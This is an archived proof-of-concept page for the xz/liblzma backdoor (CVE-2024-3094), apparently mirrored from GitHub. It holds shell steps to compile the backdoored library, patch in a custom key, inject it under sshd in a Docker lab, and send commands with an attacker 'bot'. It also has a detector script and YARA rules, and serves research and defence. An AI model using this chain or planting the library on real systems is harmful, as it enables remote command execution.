关联漏洞
描述
A XZ backdoor vulnerability explained in details
介绍
# 🛡️ Cybersecurity Project: Analyzing the XZ Backdoor in liblzma
## 📄 Overview
This project analyzes the high-profile backdoor discovered in **xz-utils (liblzma)**, affecting versions **5.6.0** and **5.6.1**. The malicious code introduced into the upstream build system targeted SSH authentication by modifying how `sshd` interacts with the LZMA compression library at runtime.
> ⚠️ This project is for **educational and defensive research** purposes only.
# Vulnerable machine
Clone this repository
git clone https://github.com/valeriot30/cve-2024-3094
Navigate to the directory
cd cve-2024-3094
Spawn the docker container
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev
Get a malicious version of the library
cd ~
git clone https://github.com/thesamesam/xz-archive.git
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )
tar xzf xz-5.6.0.tar.gz
mv xz-5.6.0 ~
Export the build target
export RPM_ARCH=$(uname -m)
Compile the malicious library
cd ~
cd ./xz-5.6.0/
./configure
make -j 8
Copy the malicious SO outside:
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~
Clone again the repository inside the container
git clone https://github.com/valeriot30/cve-2024-3094
Patch the liblzma library with a custom key
python3 cve-2024-3094/patch.py liblzma.so.5.6.0
Link the malicious library in the system
sh cve-2024-3094/inject.sh
Run the sshd linked with the malicious library
env -i LANG=C /usr/sbin/sshd -D &
# Attacker machine
Clone this repository
git clone https://github.com/valeriot30/cve-2024-3094
Navigate to the directory
cd cve-2024-3094
Compile the GO Tool
go build
Use the tool by inserting vulnerable machine IP address and the command to execute
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'
# Counter-Measures
## Using the detector
Run the detector
sh detector.sh
## Using Yara
Use the yara matching rules
yara rule.yar ../liblzma.so.5.6.0 -s
文件快照
[4.0K] /data/pocs/b4f00e04447c7425f3520641ccebc1365b93a457
├── [4.0K] assets
│ ├── [242K] liblzma.so.5.6.0
│ └── [242K] liblzma.so.5.6.0.patch
├── [5.7M] bot
├── [4.1K] bot.go
├── [ 620] configure.sh
├── [ 433] detector.sh
├── [ 522] Dockerfile
├── [ 771] generator.py
├── [ 165] go.mod
├── [ 558] go.sum
├── [ 208] inject.sh
├── [242K] liblzma.so.5.6.0.patch
├── [2.1K] patch_libzma.py
├── [1.5K] patch.py
├── [2.0K] README.md
├── [ 50] requirements.txt
├── [7.7K] reverse_shell.py
└── [ 670] rule.yar
1 directory, 18 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。